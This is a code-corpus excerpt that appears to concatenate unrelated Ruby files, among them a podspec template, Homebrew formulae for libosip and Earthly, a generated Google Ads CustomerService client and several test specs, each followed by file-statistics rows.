s.version = "0.0.2"
s.summary = "A short description of hehe."
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
123123123
DESC
s.homepage = "http://EXAMPLE/hehe"
# s.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
s.prepare_command = <<-CMD
touch "./Classes/`date`"
CMD
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Licensing your code is important. See http://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
s.license = "MIT"
# s.license = { :type => "MIT", :file => "FILE_LICENSE" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
s.author = { "chenxi" => "[email protected]" }
# Or just: s.author = "chenxi"
# s.authors = { "chenxi" => "[email protected]" }
# s.social_media_url = "http://twitter.com/chenxi"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
# s.platform = :ios
# s.platform = :ios, "5.0"
# When using multiple platforms
# s.ios.deployment_target = "5.0"
# s.osx.deployment_target = "10.7"
# s.watchos.deployment_target = "2.0"
# s.tvos.deployment_target = "9.0"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
s.source = { :git => "http://github/hehe.git", :tag => "#{s.version}" }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# CocoaPods is smart about how it includes source code. For source files
# giving a folder will include any swift, h, m, mm, c & cpp files.
# For header files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
s.source_files = "Classes", "Classes/**/*.{h,m}"
s.exclude_files = "Classes/Exclude"
s.preserve_path = 'Classes/*'
# s.public_header_files = "Classes/**/*.h"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# s.resource = "icon.png"
# s.resources = "Resources/*.png"
# s.preserve_paths = "FilesToSave", "MoreFilesToSave"
# ――― Project Linking ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
# s.framework = "SomeFramework"
# s.frameworks = "SomeFramework", "AnotherFramework"
# s.library = "iconv"
# s.libraries = "iconv", "xml2"
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
# s.requires_arc = true
# s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# s.dependency "JSONKit", "~> 1.4"
end
| 35.901408 | 93 | 0.58827 |
abbde0abedf3a8e89f98a8c01c5510a1ae7d07ef | 1,005 | class Libosip < Formula
desc "Implementation of the eXosip2 stack"
homepage "https://www.gnu.org/software/osip/"
url "https://ftpmirror.gnu.org/osip/libosip2-4.1.0.tar.gz"
mirror "https://ftp.gnu.org/gnu/osip/libosip2-4.1.0.tar.gz"
sha256 "996aa0363316a871915b6f12562af53853a9962bb93f6abe1ae69f8de7008504"
bottle do
cellar :any
rebuild 2
sha256 "62a51e2ea7a623ab89b628d0a5655afe390dbeab86f5d86dd799c046e6767e77" => :sierra
sha256 "f55f17a9fcefb3780ec0ef62dcf65e46606e6a76f86e37bbbb1a70b9de12e1b1" => :el_capitan
sha256 "87803e02c0c3b65c8f028864200425f90b5a708bb6204a410f6c76a9e35545ee" => :yosemite
sha256 "531e7d5fb51ec0ccdc05b3e3346710770f756fa8b3eb7eb2cbbbe5b2cb1c8d59" => :mavericks
sha256 "c9424adf4a5eae16c98276e958650cadb419b54b0c3b420a7d81006d423ea2f7" => :mountain_lion
end
def install
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
end
| 41.875 | 95 | 0.761194 |
ab56f118c4ac6a8337d6ca619017f9c98164b113 | 74 | FactoryBot.define do
factory :task, class: "Lakatan::Task" do
end
end
| 14.8 | 42 | 0.716216 |
e2711f29cb69766fa6a783c8690a625896e4533c | 34,058 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# require "google/ads/google_ads/error"
require "google/ads/google_ads/v8/services/customer_service_pb"
module Google
module Ads
module GoogleAds
module V8
module Services
module CustomerService
##
# Client for the CustomerService service.
#
# Service to manage customers.
#
class Client
include Paths
# @private
attr_reader :customer_service_stub
##
# Configure the CustomerService Client class.
#
# See {::Google::Ads::GoogleAds::V8::Services::CustomerService::Client::Configuration}
# for a description of the configuration fields.
#
# @example
#
# # Modify the configuration for all CustomerService clients
# ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
@configure ||= begin
default_config = Client::Configuration.new
default_config.timeout = 3600.0
default_config.retry_policy = {
initial_delay: 5.0, max_delay: 60.0, multiplier: 1.3, retry_codes: [14, 4]
}
default_config
end
yield @configure if block_given?
@configure
end
##
# Configure the CustomerService Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Ads::GoogleAds::V8::Services::CustomerService::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def configure
yield @config if block_given?
@config
end
##
# Create a new CustomerService client object.
#
# @example
#
# # Create a client using the default configuration
# client = ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.new
#
# # Create a client using a custom configuration
# client = ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the CustomerService client.
# @yieldparam config [Client::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the gRPC module only when it's required.
# See https://github.com/googleapis/toolkit/issues/446
require "gapic/grpc"
require "google/ads/google_ads/v8/services/customer_service_services_pb"
# Create the configuration object
@config = Configuration.new Client.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
# Use self-signed JWT if the endpoint is unchanged from default,
# but only if the default endpoint does not have a region prefix.
enable_self_signed_jwt = @config.endpoint == Client.configure.endpoint &&
[email protected](".").first.include?("-")
credentials ||= Credentials.default scope: @config.scope,
enable_self_signed_jwt: enable_self_signed_jwt
if credentials.is_a?(::String) || credentials.is_a?(::Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@quota_project_id = @config.quota_project
@quota_project_id ||= credentials.quota_project_id if credentials.respond_to? :quota_project_id
@customer_service_stub = ::Gapic::ServiceStub.new(
::Google::Ads::GoogleAds::V8::Services::CustomerService::Stub,
credentials: credentials,
endpoint: @config.endpoint,
channel_args: @config.channel_args,
interceptors: @config.interceptors
)
end
# Service calls
##
# Returns the requested customer in full detail.
#
# List of thrown errors:
# [AuthenticationError]()
# [AuthorizationError]()
# [HeaderError]()
# [InternalError]()
# [QuotaError]()
# [RequestError]()
#
# @overload get_customer(request, options = nil)
# Pass arguments to `get_customer` via a request object, either of type
# {::Google::Ads::GoogleAds::V8::Services::GetCustomerRequest} or an equivalent Hash.
#
# @param request [::Google::Ads::GoogleAds::V8::Services::GetCustomerRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_customer(resource_name: nil)
# Pass arguments to `get_customer` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param resource_name [::String]
# Required. The resource name of the customer to fetch.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Ads::GoogleAds::V8::Resources::Customer]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Ads::GoogleAds::V8::Resources::Customer]
#
# @raise [Google::Ads::GoogleAds::Error] if the RPC is aborted.
#
def get_customer request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request,
to: ::Google::Ads::GoogleAds::V8::Services::GetCustomerRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.get_customer.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Ads::GoogleAds::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"resource_name" => request.resource_name
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.get_customer.timeout,
metadata: metadata,
retry_policy: @config.rpcs.get_customer.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@customer_service_stub.call_rpc :get_customer, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
# rescue GRPC::BadStatus => grpc_error
# raise Google::Ads::GoogleAds::Error.new grpc_error.message
end
##
# Updates a customer. Operation statuses are returned.
#
# List of thrown errors:
# [AuthenticationError]()
# [AuthorizationError]()
# [DatabaseError]()
# [FieldMaskError]()
# [HeaderError]()
# [InternalError]()
# [QuotaError]()
# [RequestError]()
# [UrlFieldError]()
#
# @overload mutate_customer(request, options = nil)
# Pass arguments to `mutate_customer` via a request object, either of type
# {::Google::Ads::GoogleAds::V8::Services::MutateCustomerRequest} or an equivalent Hash.
#
# @param request [::Google::Ads::GoogleAds::V8::Services::MutateCustomerRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload mutate_customer(customer_id: nil, operation: nil, validate_only: nil, response_content_type: nil)
# Pass arguments to `mutate_customer` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param customer_id [::String]
# Required. The ID of the customer being modified.
# @param operation [::Google::Ads::GoogleAds::V8::Services::CustomerOperation, ::Hash]
# Required. The operation to perform on the customer
# @param validate_only [::Boolean]
# If true, the request is validated but not executed. Only errors are
# returned, not results.
# @param response_content_type [::Google::Ads::GoogleAds::V8::Enums::ResponseContentTypeEnum::ResponseContentType]
# The response content type setting. Determines whether the mutable resource
# or just the resource name should be returned post mutation.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Ads::GoogleAds::V8::Services::MutateCustomerResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Ads::GoogleAds::V8::Services::MutateCustomerResponse]
#
# @raise [Google::Ads::GoogleAds::Error] if the RPC is aborted.
#
def mutate_customer request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request,
to: ::Google::Ads::GoogleAds::V8::Services::MutateCustomerRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.mutate_customer.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Ads::GoogleAds::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"customer_id" => request.customer_id
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.mutate_customer.timeout,
metadata: metadata,
retry_policy: @config.rpcs.mutate_customer.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@customer_service_stub.call_rpc :mutate_customer, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
# rescue GRPC::BadStatus => grpc_error
# raise Google::Ads::GoogleAds::Error.new grpc_error.message
end
##
# Returns resource names of customers directly accessible by the
# user authenticating the call.
#
# List of thrown errors:
# [AuthenticationError]()
# [AuthorizationError]()
# [HeaderError]()
# [InternalError]()
# [QuotaError]()
# [RequestError]()
#
# @overload list_accessible_customers(request, options = nil)
# Pass arguments to `list_accessible_customers` via a request object, either of type
# {::Google::Ads::GoogleAds::V8::Services::ListAccessibleCustomersRequest} or an equivalent Hash.
#
# @param request [::Google::Ads::GoogleAds::V8::Services::ListAccessibleCustomersRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Ads::GoogleAds::V8::Services::ListAccessibleCustomersResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Ads::GoogleAds::V8::Services::ListAccessibleCustomersResponse]
#
# @raise [Google::Ads::GoogleAds::Error] if the RPC is aborted.
#
def list_accessible_customers request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request,
to: ::Google::Ads::GoogleAds::V8::Services::ListAccessibleCustomersRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.list_accessible_customers.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Ads::GoogleAds::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
options.apply_defaults timeout: @config.rpcs.list_accessible_customers.timeout,
metadata: metadata,
retry_policy: @config.rpcs.list_accessible_customers.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@customer_service_stub.call_rpc :list_accessible_customers, request,
options: options do |response, operation|
yield response, operation if block_given?
return response
end
# rescue GRPC::BadStatus => grpc_error
# raise Google::Ads::GoogleAds::Error.new grpc_error.message
end
##
# Creates a new client under manager. The new client customer is returned.
#
# List of thrown errors:
# [AccessInvitationError]()
# [AuthenticationError]()
# [AuthorizationError]()
# [CurrencyCodeError]()
# [HeaderError]()
# [InternalError]()
# [ManagerLinkError]()
# [QuotaError]()
# [RequestError]()
# [StringLengthError]()
# [TimeZoneError]()
#
# @overload create_customer_client(request, options = nil)
# Pass arguments to `create_customer_client` via a request object, either of type
# {::Google::Ads::GoogleAds::V8::Services::CreateCustomerClientRequest} or an equivalent Hash.
#
# @param request [::Google::Ads::GoogleAds::V8::Services::CreateCustomerClientRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload create_customer_client(customer_id: nil, customer_client: nil, email_address: nil, access_role: nil, validate_only: nil)
# Pass arguments to `create_customer_client` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param customer_id [::String]
# Required. The ID of the Manager under whom client customer is being created.
# @param customer_client [::Google::Ads::GoogleAds::V8::Resources::Customer, ::Hash]
# Required. The new client customer to create. The resource name on this customer
# will be ignored.
# @param email_address [::String]
# Email address of the user who should be invited on the created client
# customer. Accessible only to customers on the allow-list.
# @param access_role [::Google::Ads::GoogleAds::V8::Enums::AccessRoleEnum::AccessRole]
# The proposed role of user on the created client customer.
# Accessible only to customers on the allow-list.
# @param validate_only [::Boolean]
# If true, the request is validated but not executed. Only errors are
# returned, not results.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Ads::GoogleAds::V8::Services::CreateCustomerClientResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Ads::GoogleAds::V8::Services::CreateCustomerClientResponse]
#
# @raise [Google::Ads::GoogleAds::Error] if the RPC is aborted.
#
def create_customer_client request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request,
to: ::Google::Ads::GoogleAds::V8::Services::CreateCustomerClientRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.create_customer_client.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Ads::GoogleAds::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"customer_id" => request.customer_id
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.create_customer_client.timeout,
metadata: metadata,
retry_policy: @config.rpcs.create_customer_client.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@customer_service_stub.call_rpc :create_customer_client, request,
options: options do |response, operation|
yield response, operation if block_given?
return response
end
# rescue GRPC::BadStatus => grpc_error
# raise Google::Ads::GoogleAds::Error.new grpc_error.message
end
##
# Configuration class for the CustomerService API.
#
# This class represents the configuration for CustomerService,
# providing control over timeouts, retry behavior, logging, transport
# parameters, and other low-level controls. Certain parameters can also be
# applied individually to specific RPCs. See
# {::Google::Ads::GoogleAds::V8::Services::CustomerService::Client::Configuration::Rpcs}
# for a list of RPCs that can be configured independently.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# @example
#
# # Modify the global config, setting the timeout for
# # get_customer to 20 seconds,
# # and all remaining timeouts to 10 seconds.
# ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.configure do |config|
# config.timeout = 10.0
# config.rpcs.get_customer.timeout = 20.0
# end
#
# # Apply the above configuration only to a new client.
# client = ::Google::Ads::GoogleAds::V8::Services::CustomerService::Client.new do |config|
# config.timeout = 10.0
# config.rpcs.get_customer.timeout = 20.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"googleads.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`GRPC::Core::Channel`) a gRPC channel with included credentials
# * (`GRPC::Core::ChannelCredentials`) a gRPC credentails object
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] channel_args
# Extra parameters passed to the gRPC channel. Note: this is ignored if a
# `GRPC::Core::Channel` object is provided as the credential.
# @return [::Hash]
# @!attribute [rw] interceptors
# An array of interceptors that are run before calls are executed.
# @return [::Array<::GRPC::ClientInterceptor>]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
# @!attribute [rw] metadata
# Additional gRPC headers to be sent with the call.
# @return [::Hash{::Symbol=>::String}]
# @!attribute [rw] retry_policy
# The retry policy. The value is a hash with the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
# @return [::Hash]
# @!attribute [rw] quota_project
# A separate project against which to charge quota.
# @return [::String]
#
class Configuration
extend ::Gapic::Config
config_attr :endpoint, "googleads.googleapis.com", ::String
config_attr :credentials, nil do |value|
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client,
nil]
allowed += [::GRPC::Core::Channel, ::GRPC::Core::ChannelCredentials] if defined? ::GRPC
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr(:channel_args, { "grpc.service_config_disable_resolution" => 1 }, ::Hash, nil)
config_attr :interceptors, nil, ::Array, nil
config_attr :timeout, nil, ::Numeric, nil
config_attr :metadata, nil, ::Hash, nil
config_attr :retry_policy, nil, ::Hash, ::Proc, nil
config_attr :quota_project, nil, ::String, nil
# @private
def initialize parent_config = nil
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
##
# Configurations for individual RPCs
# @return [Rpcs]
#
def rpcs
@rpcs ||= begin
parent_rpcs = nil
parent_rpcs = @parent_config.rpcs if defined?(@parent_config) && @parent_config.respond_to?(:rpcs)
Rpcs.new parent_rpcs
end
end
##
# Configuration RPC class for the CustomerService API.
#
# Includes fields providing the configuration for each RPC in this service.
# Each configuration object is of type `Gapic::Config::Method` and includes
# the following configuration fields:
#
# * `timeout` (*type:* `Numeric`) - The call timeout in seconds
# * `metadata` (*type:* `Hash{Symbol=>String}`) - Additional gRPC headers
# * `retry_policy (*type:* `Hash`) - The retry policy. The policy fields
# include the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
#
class Rpcs
##
# RPC-specific configuration for `get_customer`
# @return [::Gapic::Config::Method]
#
attr_reader :get_customer
##
# RPC-specific configuration for `mutate_customer`
# @return [::Gapic::Config::Method]
#
attr_reader :mutate_customer
##
# RPC-specific configuration for `list_accessible_customers`
# @return [::Gapic::Config::Method]
#
attr_reader :list_accessible_customers
##
# RPC-specific configuration for `create_customer_client`
# @return [::Gapic::Config::Method]
#
attr_reader :create_customer_client
# @private
def initialize parent_rpcs = nil
get_customer_config = parent_rpcs.get_customer if parent_rpcs.respond_to? :get_customer
@get_customer = ::Gapic::Config::Method.new get_customer_config
mutate_customer_config = parent_rpcs.mutate_customer if parent_rpcs.respond_to? :mutate_customer
@mutate_customer = ::Gapic::Config::Method.new mutate_customer_config
list_accessible_customers_config = parent_rpcs.list_accessible_customers if parent_rpcs.respond_to? :list_accessible_customers
@list_accessible_customers = ::Gapic::Config::Method.new list_accessible_customers_config
create_customer_client_config = parent_rpcs.create_customer_client if parent_rpcs.respond_to? :create_customer_client
@create_customer_client = ::Gapic::Config::Method.new create_customer_client_config
yield self if block_given?
end
end
end
end
end
end
end
end
end
end
| 52.396923 | 146 | 0.541694 |
e89679f057a2b19056eafc020dfa433f17748167 | 1,329 | # frozen_string_literal: true
require 'spec_helper'
describe 'GeoCalc' do
describe 'Spherical distance between' do
let(:point_one) { Location.new(0.0, 0.0) }
let(:point_two) { Location.new(0.0, 1.0) }
it 'should be equal to 110951' do
expect(GeoCalc.distance_between(point_one, point_two).value.round).to eq(110_951)
end
end
describe 'Spherical distance between two close points' do
let(:point_one) { Location.new(52.531151, 13.375673) }
let(:point_two) { Location.new(52.531941, 13.377818) }
it 'should be equal to 169' do
expect(GeoCalc.distance_between(point_one, point_two).value.round).to eq(169)
end
end
describe 'Spherical distance between LA city hall and NY City Hall' do
let(:la_city_hall) { Location.new(34.0459068, -118.2715222) }
let(:ny_city_hall) { Location.new(40.7127784, -74.0082477) }
context 'when performing long distance calculations' do
it 'error should be less than 600 meters' do
distance = GeoCalc.distance_between(la_city_hall, ny_city_hall).value.round
# distance calculation from google as a reference for comparison
google_distance = 4_489_000.0
# less than 300m of error for long distances
expect((distance - google_distance).abs / 1000).to be < 600
end
end
end
end
| 33.225 | 87 | 0.696764 |
bf916580c031697f3da85c922afd56763b70be22 | 117 | #if Rails.env.staging? || Rails.env.production?
# SMTP_SETTINGS = {
# api_key: ENV['POSTMARK_API_KEY']
# }
#end
| 19.5 | 47 | 0.65812 |
21072f829ef84b40591df386196ac1c5fa8a5331 | 306 | # encoding utf-8
# Copyright (c) Universidade Federal Fluminense (UFF).
# This file is part of SAPOS. Please, consult the license terms in the LICENSE file.
class AddExtendOnHoldToPhases < ActiveRecord::Migration
def change
add_column :phases, :extend_on_hold, :boolean, :default => false
end
end
| 30.6 | 84 | 0.75817 |
f84851de9e5102193a4dc6d5723aa4fb878cfdf5 | 1,294 | require 'test_helper'
class TestBase2Csv < Test::Unit::TestCase
def test_load_strings
expected_output = {}
output = Babelish::Base2Csv.new.send :load_strings, nil
assert_equal expected_output, output
end
def test_create_csv_file
keys = ["ERROR_HANDLER_WARNING_DISMISS", "ANOTHER_STRING"]
filename = "test_data"
strings = {filename => {"ERROR_HANDLER_WARNING_DISMISS" => "OK", "ANOTHER_STRING" => "hello"}}
converter = Babelish::Base2Csv.new(:headers => %w{variables english}, :filenames => [filename])
converter.send :create_csv_file, keys, strings
assert File.exist?(converter.csv_filename)
#clean up
system("rm -rf ./" + converter.csv_filename)
end
def test_initialize
csv_filename = "file.csv"
filenames = %w{"french.strings english.strings"}
headers = %w{"constants french english"}
converter = Babelish::Base2Csv.new({
:csv_filename => csv_filename,
:headers => headers,
:filenames => filenames
})
assert_equal csv_filename, converter.csv_filename
assert_equal headers, converter.headers
assert_equal filenames, converter.filenames
end
def test_initialize_with_default_values
converter = Babelish::Base2Csv.new
assert_not_nil converter.csv_filename
end
end
| 29.409091 | 99 | 0.710974 |
f85822d4ac322746e2f1ca86f2eb191b87b3e536 | 2,012 | class Earthly < Formula
desc "Build automation tool for the container era"
homepage "https://earthly.dev/"
url "https://github.com/earthly/earthly/archive/v0.5.8.tar.gz"
sha256 "6ef27bea990737c9ed76dfd05699c0b992ee0ca72c939b53c036748afee97385"
license "BUSL-1.1"
head "https://github.com/earthly/earthly.git"
livecheck do
url :stable
strategy :github_latest
end
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "96c08a5ec465e6c2e72aa08a748e31582f03e6ce579e801f807f035bad826c7e"
sha256 cellar: :any_skip_relocation, big_sur: "b3ce125190285a7e77042c0d7bb20b58278713b20cae6443675559cbfdc5caf3"
sha256 cellar: :any_skip_relocation, catalina: "50c318813ebaa8eb0d1903469b51acbfb892538c5cdbad6acf438ff2bb18d0b8"
sha256 cellar: :any_skip_relocation, mojave: "cd5ad392759f2fca3f2d4066a69d28cd574a60a1f6b4664c86c8ac6d95ca46c6"
sha256 cellar: :any_skip_relocation, x86_64_linux: "3cf4fb7382e556932176089d413652e479f564e15f0fcbb01199c02b2aa19548"
end
depends_on "go" => :build
def install
ldflags = "-X main.DefaultBuildkitdImage=earthly/buildkitd:v#{version} -X main.Version=v#{version} -X" \
" main.GitSha=53c5fa7a37989eea72e2a88c2f4d9c04257c6faf "
tags = "dfrunmount dfrunsecurity dfsecrets dfssh dfrunnetwork"
system "go", "build",
"-tags", tags,
"-ldflags", ldflags,
*std_go_args,
"./cmd/earthly/main.go"
bash_output = Utils.safe_popen_read("#{bin}/earthly", "bootstrap", "--source", "bash")
(bash_completion/"earthly").write bash_output
zsh_output = Utils.safe_popen_read("#{bin}/earthly", "bootstrap", "--source", "zsh")
(zsh_completion/"_earthly").write zsh_output
end
test do
(testpath/"build.earthly").write <<~EOS
default:
\tRUN echo Homebrew
EOS
output = shell_output("#{bin}/earthly --buildkit-host 127.0.0.1 +default 2>&1", 1).strip
assert_match "Error while dialing invalid address 127.0.0.1", output
end
end
| 39.45098 | 122 | 0.73161 |
180040f4bd3d8b597c931372c646a532d6039e3d | 2,128 | # coding: utf-8
require "danger/request_sources/vsts"
RSpec.describe Danger::RequestSources::VSTS, host: :vsts do
let(:env) { stub_env }
